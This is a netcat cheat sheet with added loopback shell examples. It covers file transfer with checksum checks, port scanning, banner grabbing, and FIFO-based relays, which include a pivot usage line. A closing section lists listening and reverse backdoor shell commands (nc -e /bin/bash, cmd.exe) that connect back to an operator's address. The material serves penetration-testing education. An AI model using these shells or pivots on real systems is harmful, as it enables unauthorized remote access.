- Download: http://joncraton.org/blog/netcat-for-windows
- Reference: http://en.wikipedia.org/wiki/Netcat
- Reference: http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
[Fundamentals]
1. Fundamental Netcat Client:
# nc [TargetIPaddr] [TargetPort]
Connect to an arbitrary port [TargetPort] at IP Address [TargetIPaddr]
2. Fundamental Netcat Listener:
# nc -l -p [LocalPort]
Create a Netcat listener on arbitrary local port [LocalPort]
# nc -lvk -p [LocalPort]
If you want to force Netcat to stay listening after one connection closes, use the -k flag (available in the OpenBSD netcat and in Ncat; the traditional netcat has no -k and exits when its first connection ends). The -v (verbose) flag makes Netcat report who is connecting (on stderr), which matters with -k because different computers may connect to you during the life of the listener.
Both the client and listener take input from STDIN, and print responses to STDOUT.
[File Transfer]
1. Push a file
(1) Connect & Upload (Being a Netcat Client):
# nc [TargetIPaddr] [TargetPort] < [InFile]
Push the file [InFile] to IP address [TargetIPaddr] on port [TargetPort]
(2) Listen & Upload (Being a Netcat Listener):
# nc -l -p [LocalPort] < [InFile]
Listen on [LocalPort], prepare to push [InFile]
2. Pull a file
(1) Listen & Download (Being a Netcat Listener):
# nc -l -w3 -p [LocalPort] > [OutFile]
Pull a file being pushed to you on local port [LocalPort] and store it in [OutFile], closing the connection after 3 seconds (the OpenBSD netcat ignores -w in listen mode; there the listener simply ends when the sender closes the connection)
(2) Connect & Download (Being a Netcat Client):
# nc -w3 [TargetIPaddr] [TargetPort] > [OutFile]
Connect to IP address [TargetIPaddr] on port [TargetPort], store whatever is received in [OutFile], and close the connection after 3 seconds
Adjust the wait time from 3 to any number of seconds that is ample time to transfer the specified file. Netcat puts no end-of-file marker on the wire, so a timeout that is too short silently truncates the file; compare a checksum (md5sum or sha256sum) of [InFile] and [OutFile] before trusting the copy.
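The push/pull pair above run end to end over loopback, followed by the integrity check the sheet leaves to you. This is an added example, not part of the original cheat sheet; the function names (nc_receive, nc_send, file_digest, nc_transfer_verify), the port numbers and the loopback setup are all constructed for the demonstration. It assumes a netcat that accepts -l -p and -w (traditional nc, Debian's netcat-openbsd, busybox nc) and coreutils sha256sum.

```shell
#!/bin/sh
# Added example, not from the cheat sheet: "Push a file" (1) on the sender
# and "Pull a file" (1) on the receiver, then the check netcat itself cannot
# do. Netcat puts no framing, checksum or authentication on the wire: the
# listener stores whatever bytes arrive from whoever connects first, and the
# sender's -w timeout only guesses that the transfer is over.
# Assumed environment: a netcat accepting "-l -p" and "-w" (traditional nc,
# Debian's netcat-openbsd, busybox nc) and coreutils sha256sum.

# Receiver: "Listen & Download" without the sheet's -w3 on the listener,
# because the OpenBSD variant ignores -w in listen mode anyway; the listener
# exits when the sender closes the connection.
nc_receive() {
    port=$1; out=$2
    nc -l -p "$port" > "$out"
}

# Sender: "Connect & Upload". After stdin hits EOF, -w 3 lets the client
# close once the socket has been idle for 3 seconds.
nc_send() {
    host=$1; port=$2; in=$3
    nc -w 3 "$host" "$port" < "$in"
}

# SHA-256 hex digest of a file (sha256sum prints "<hex>  <name>").
file_digest() {
    sha256sum "$1" | cut -d ' ' -f 1
}

# Receiver and sender on one box: start the listener, push the file, wait
# for the listener to finish, then compare digests. Prints "ok" and returns
# 0 when the copy is intact, "MISMATCH" and 1 otherwise.
nc_transfer_verify() {
    port=$1; in=$2; out=$3
    nc_receive "$port" "$out" &
    receiver=$!
    sleep 1                       # let the listener bind before connecting
    nc_send 127.0.0.1 "$port" "$in"
    wait "$receiver"
    if [ "$(file_digest "$in")" = "$(file_digest "$out")" ]; then
        echo ok
        return 0
    fi
    echo MISMATCH
    return 1
}

# Usage on two hosts: run "nc_receive 4444 got.bin" on the receiver, then
# "nc_send <receiver-ip> 4444 file.bin" on the sender, and compare the
# "file_digest" output of both files out of band (not over the same channel).
```

The digest comparison is the whole point: a listener that was reached by the wrong client, or a -w that expired mid-stream, produces a file that looks fine until it is hashed.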
[TCP Port Scanner]
1. Port scan an IP Address:
# nc -v -n -z -w1 [TargetIPaddr] [StartPort]-[EndPort]
Attempt to connect to each port in a range from [StartPort] to [EndPort] on IP Address [TargetIPaddr], running verbosely (-v on Linux, -vv on Windows), not resolving names (-n), without sending any data (-z), and waiting no more than 1 second for a connection to occur (-w1). Results are reported on stderr, and the wording differs between netcat variants, so scripts should key off the exit status of a single-port probe rather than the text.
The randomize ports (-r) switch can be used to randomly choose port numbers in the range to be queried, instead of the default behavior of counting down from the last port to the first.
[TCP Banner Grabber]
1. Grab the banner of any TCP service running on an IP Address from Linux:
# echo "" | nc -v -n -w1 [TargetIPaddr] [StartPort]-[EndPort]
Attempt to connect to each port in a range from [StartPort] to [EndPort] on IP Address [TargetIPaddr], running verbosely (-v on Linux, -vv on Windows), not resolving names (-n), and waiting no more than 1 second for a connection to occur (-w1). Then send a blank line to the open port and print out any banner received in response. Services that wait for the client to speak first (TLS, for one) return nothing this way.
Add -p [Port] to specify a source port. The randomize ports (-r) switch can be used to randomly choose port numbers in the range to be queried, instead of the default behavior of counting down from the last port to the first.
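The scanner and banner grabber above, reworked so that each port is probed by its own nc invocation and the verdict comes from nc's exit status instead of its -v wording. This is an added example, not from the cheat sheet; the function names (port_state, scan_range, grab_banner) and the loopback test service are constructed for it. It assumes a netcat with -n, -z and -w (the traditional or OpenBSD netcat; busybox nc has no -z).

```shell
#!/bin/sh
# Added example, not from the cheat sheet: the scan and banner-grab
# one-liners above, probing one port per nc invocation so the verdict comes
# from nc's exit status instead of its -v output (whose wording differs
# between the traditional and OpenBSD variants and between Linux and Windows).
# Assumed environment: a netcat with -n, -z and -w (traditional nc or the
# OpenBSD one; busybox nc has no -z).

# "open" or "closed" for one TCP port: -z connects and sends nothing,
# -n skips name resolution, -w 1 gives a silent host one second.
port_state() {
    host=$1; port=$2
    if nc -n -z -w 1 "$host" "$port" >/dev/null 2>&1; then
        echo open
    else
        echo closed
    fi
}

# Walk a port range, printing "<port> open" for each open port. Counts up
# rather than in netcat's own high-to-low order; pipe the range through
# shuf if you want the effect of -r. A closed port costs a refused connect
# or, on a filtering host, the full 1 second timeout.
scan_range() {
    host=$1; port=$2; last=$3
    while [ "$port" -le "$last" ]; do
        if [ "$(port_state "$host" "$port")" = open ]; then
            echo "$port open"
        fi
        port=$((port + 1))
    done
}

# Send a blank line and print the first line the service answers with, as
# the echo "" | nc form does, but for one port and with the CR stripped so
# SMTP/HTTP/FTP banners compare cleanly. -w 2 bounds the wait on a service
# that says nothing until the client speaks (TLS, for one): it prints nothing.
grab_banner() {
    host=$1; port=$2
    printf '\r\n' | nc -n -w 2 "$host" "$port" 2>/dev/null | head -n 1 | tr -d '\r'
}

# Usage: scan_range 10.0.0.5 20 1024; grab_banner 10.0.0.5 22
```

Keying off the exit status is what makes this portable: the same functions work whether nc prints "succeeded!" or "(UNKNOWN) [...] open", and the blank-line probe is deliberately CRLF so line-oriented services treat it as an empty command rather than garbage.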
[Netcat Relays on Windows]
To start, enter a temporary directory where we will be creating a series of .bat files:
C:\> cd C:\temp
1. Relay from a Netcat Listener to a Netcat Client:
C:\temp> echo nc [TargetIPaddr] [TargetPort] > relay.bat
C:\temp> nc -l -p [LocalPort] -e relay.bat
Create a relay that will route packets from the local port [LocalPort] to a Netcat Client connected to [TargetIPaddr] on port [TargetPort]
2. Relay from Netcat Client to Netcat Client:
C:\temp> echo nc [TargetIPaddr] [TargetPort] > relay.bat
C:\temp> nc [SourceIPaddr] [SourcePort] -e relay.bat
Create a relay that will route packets from the connection to [SourceIPaddr] on port [SourcePort] to a Netcat Client connected to [TargetIPaddr] on port [TargetPort]
3. Relay from Netcat Listener to Netcat Listener:
C:\temp> echo nc -l -p [LocalPort2] > relay.bat
C:\temp> nc -l -p [LocalPort1] -e relay.bat
Create a relay that will route packets from any connection connected to [LocalPort1] to any connection connected to [LocalPort2]
[Netcat Relays on Linux]
To start, enter a temporary directory and create a FIFO called backpipe:
# cd /tmp
# mknod backpipe p
mknod - make block or character special files
mknod [OPTION]... NAME TYPE [MAJOR MINOR]
TYPE p : create a FIFO
1. Relay from a Netcat Listener to a Netcat Client:
# nc -l -p [LocalPort] 0<backpipe | nc [TargetIPaddr] [TargetPort] | tee backpipe
Create a relay that will route packets from the local port [LocalPort] to a Netcat Client connected to [TargetIPaddr] on port [TargetPort]: data from the inbound connection flows down the pipe into the outbound client, and the target's replies come back through tee and the backpipe FIFO into the listener's stdin. Note that the outbound nc connects to the target as soon as the command is started, not when a client arrives, and each nc handles one connection, so the relay serves a single session.
0: STDIN, 1:STDOUT, 2:STDERR
tee - read from standard input and write to standard output and files
tee [OPTION]... [FILE]...
2. Relay from Netcat Client to Netcat Client:
# nc [SourceIPaddr] [SourcePort] 0<backpipe | nc [TargetIPaddr] [TargetPort] | tee backpipe
Create a relay that will route packets from the connection to [SourceIPaddr] on port [SourcePort] to a Netcat Client connected to [TargetIPaddr] on port [TargetPort]
3. Relay from Netcat Listener to Netcat Listener:
# nc -l -p [LocalPort1] 0<backpipe | nc -l -p [LocalPort2] | tee backpipe
Create a relay that will route packets from any connection connected to [LocalPort1] to any connection connected to [LocalPort2]
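The Linux "Listener to Client" relay run end to end over loopback, with a constructed back-end service so that traffic in both directions can be checked. This is an added example and not part of the cheat sheet; the function names (start_relay, start_service, relay_client), the greeting text and the port numbers are constructed for it. It assumes a netcat accepting -l -p and -w (traditional nc, Debian's netcat-openbsd, busybox nc) plus mkfifo and tee.

```shell
#!/bin/sh
# Added example, not from the cheat sheet: the Linux "Listener to Client"
# relay above, run over loopback with a constructed back-end service so both
# directions can be checked. The service greets whoever connects and records
# what it receives; the client only ever talks to the relay port.
# Assumed environment: a netcat accepting "-l -p" and "-w" (traditional nc,
# Debian's netcat-openbsd, busybox nc) plus mkfifo and tee.

# Relay: what arrives on $lport is piped into a client for $thost:$tport; the
# target's replies come back through tee and the FIFO into the listener's
# stdin. Runs in the background and serves one session, since each nc exits
# when its socket closes. The outbound nc connects to the target as soon as
# the relay starts, not when a client shows up. The sheet's version lets tee
# echo the return traffic to the terminal; here it is discarded.
start_relay() {
    lport=$1; thost=$2; tport=$3; fifo=$4
    rm -f "$fifo"
    mkfifo "$fifo"
    # -w 3 on the outbound leg: when the inbound side closes, this nc's stdin
    # reaches EOF and the idle timeout lets it close instead of waiting forever.
    nc -l -p "$lport" 0<"$fifo" | nc -w 3 "$thost" "$tport" | tee "$fifo" >/dev/null &
}

# Constructed back-end: sends $greeting to the first connection, stores
# everything it receives in $log, and exits when the peer closes.
start_service() {
    port=$1; greeting=$2; log=$3
    printf '%s\n' "$greeting" | nc -l -p "$port" > "$log" &
}

# Client of the relay: sends one line, prints what comes back, hangs up after
# 3 idle seconds.
relay_client() {
    host=$1; port=$2; msg=$3
    printf '%s\n' "$msg" | nc -w 3 "$host" "$port"
}

# Usage on a real pivot: start_relay 8080 10.0.0.5 80 /tmp/backpipe on the
# box that can reach 10.0.0.5, then point a client at <pivot-ip>:8080.
```

The FIFO is what makes the relay bidirectional: a plain pipe only carries data from the listener to the outbound client, so without the backpipe the target's replies would go to the terminal and never reach the inbound connection.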
[Backdoor Shells]
1. Listening backdoor shell on Linux:
# nc -l -p [LocalPort] -e /bin/bash
2. Listening backdoor shell on Windows:
C:\> nc -l -p [LocalPort] -e cmd.exe
Create a shell on local port [LocalPort] that can then be connected to using a fundamental client. -e requires a netcat built with it (the traditional netcat compiled with GAPING_SECURITY_HOLE, or Ncat's -e); the OpenBSD netcat has no -e at all. Nothing authenticates or encrypts the session: anyone who can reach the port gets the shell.
3. Reverse backdoor shell on Linux:
# nc [YourIPaddr] [YourPort] -e /bin/bash
4. Reverse backdoor shell on Windows:
C:\> nc [YourIPaddr] [YourPort] -e cmd.exe
Create a reverse shell that will attempt to connect to [YourIPaddr] on port [YourPort]. This shell can then be captured using a fundamental listener. The same -e caveat applies; the reverse form is used where inbound connections to the target are filtered but outbound ones are allowed, and it is just as unauthenticated and unencrypted as the listening one.
Keep up the educational work, man! I'm going to visit this blog more often.